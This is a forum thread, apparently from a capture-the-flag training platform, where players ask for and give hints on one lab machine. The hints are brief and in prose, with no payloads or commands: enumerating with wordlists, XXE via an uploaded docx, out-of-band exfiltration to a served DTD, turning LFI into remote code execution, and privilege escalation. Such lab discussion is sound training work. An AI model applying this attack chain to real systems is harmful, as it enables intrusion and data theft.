Heya guys , i cannot find the changelog file , only some j**n with installed packages but I cannot understand how that can help me, can anyone please nudge?
Type your comment> @seke said:
Heya guys , i cannot find the changelog file , only some j**n with installed packages but I cannot understand how that can help me, can anyone please nudge?
Hi, I too needed a nudge for this.
Seclists is the lists you need to use, it’s not easy to find though and dirbuster gave a lot of errors along the way.
I may have miss read the changelog but I have to say that it didn’t help much in the next stage.
I’m still trying to get the foothold part worked out but this box needs dedication.
If you can successfully complete the first part, you can continue without the need for a changelog file. I personally thought that after spending some time for the first episode, it might have been a rabbit hole and I gave up. but then I understood and completed it. (I opened Windows and installed a add-in for the relevant document. + I used a chrome extension. I didn’t care about the error it gave while using and saving the Chrome extension.)
If you do this part, you can find your way with the help of standard linux files …
Ok so I’m getting closer with the xxe but I keep getting conversation errors when I add in the payload.
If I remove the exploit the file uploads.
I’m just doing lfi at this point, I’m thinking permissions or I’m just over doing something.
Type your comment> @jstnlmb2008 said:
Ok so I’m getting closer with the xxe but I keep getting conversation errors when I add in the payload.
If I remove the exploit the file uploads.
I’m just doing lfi at this point, I’m thinking permissions or I’m just over doing something.
Don’t care about errors…
After a break, back to this, and stuck on www-data.
Any nudges? thanks
@salt said:
After a break, back to this, and stuck on www-data.
Any nudges? thanks
You can p ossibly spy your way to the next step.
Type your comment> @TazWake said:
@salt said:
After a break, back to this, and stuck on www-data.
Any nudges? thanks
You can p ossibly spy your way to the next step.
Sorry to be a pain but (and needing another nudge)
I’m trying to figure out the docx configuration but nothing seems to work.
I don’t get any response using public DTD or LFI, all attempts give me an undefined error.
Would I be right in thinking the response I’m looking for won’t be rendered on the returned page after submitting the file, and it’s more of my listner which gets the response?
@jstnlmb2008 said:
Sorry to be a pain but (and needing another nudge)
I’m trying to figure out the docx configuration but nothing seems to work.
I don’t get any response using public DTD or LFI, all attempts give me an undefined error.
Would I be right in thinking the response I’m looking for won’t be rendered on the returned page after submitting the file, and it’s more of my listner which gets the response?
I am away from my notes so my memory may be fuzzy here (and I didnt get far on this box yet).
The approach I used after much googling the terms, was to send a payload which called out to a file I was serving locally and then the responses were caught in the HTTP traffic.
This allowed enough data exfiltration that I could build a better attack.
Type your comment> @jstnlmb2008 said:
Sorry to be a pain but (and needing another nudge)
I’m trying to figure out the docx configuration but nothing seems to work.
I don’t get any response using public DTD or LFI, all attempts give me an undefined error.
Would I be right in thinking the response I’m looking for won’t be rendered on the returned page after submitting the file, and it’s more of my listner which gets the response?
As the box creator mentioned, you really need to follow changelog instructions. If not, it will never work.
Finally got user! Feel so good after 20 days!! Thx @seekorswim Your comment help me find how to finally transform the lfi into rce!
Got user, trying to pivot to root flag.
I see the hidden stuff in one of the directories and not sure yet if this the way forward or a rabbit hole.
The I spy game was fun, made me think about special characters which always catch me out.
It might just be me but did anyone login over ssh remotely?
I’m having to go back to exploit 1 to get back to exploit 3 when I loose the shell.
Shout out to the creator though, you made a very realistic box.
Hmmm so I think I’m on the last bit but I could do with a nudge, am I on the correct path of getting the last stage downloaded to me?
I can’t say too much here but I’ve tried to get something to download to me and the result is blank when I should be seeing some content.
I feel like I’m so close in getting what I need but it’s not doing what I expected it to do.
The above statement is referencing the RE/PWN part of another users comments in this discussion.
I found the magical changelog… I need a few nudges on the next steps. I think I understand what is needed but I am not sure.
Got root, but there is some trick where root.txt is hiddenType your comment> @Cptsticky said:
I found the magical changelog… I need a few nudges on the next steps. I think I understand what is needed but I am not sure.
Still trying to find it, almost 3 days work for this. Hardest enumeration step ever.
I think the hints was so clear, but not yet hit the correct wordlist.
So I’m super stuck on the way to root.
I’ve got a payload connecting but disconnects after exploitng with eof.
I don’t get if I’m supposed to be attacking the high ports from my host or on the server itself?
There’s an IP address in one of the script files but is that just meaning a local address or another box hosting that same service?
Finally rooted one of the best machine so far.
Respect for @gbyolo for having prepared a so complex and challenging box.
Really learnt something new.
Can’t say more hints about the box, nudges from @seekorswim are perfects.
Keep going guys!
Type your comment> @hackbarx said:
Got root, but there is some trick where root.txt is hidden
I’m having those exact issues with the leak!!! Had it work a couple of times but now it won’t no matter what I do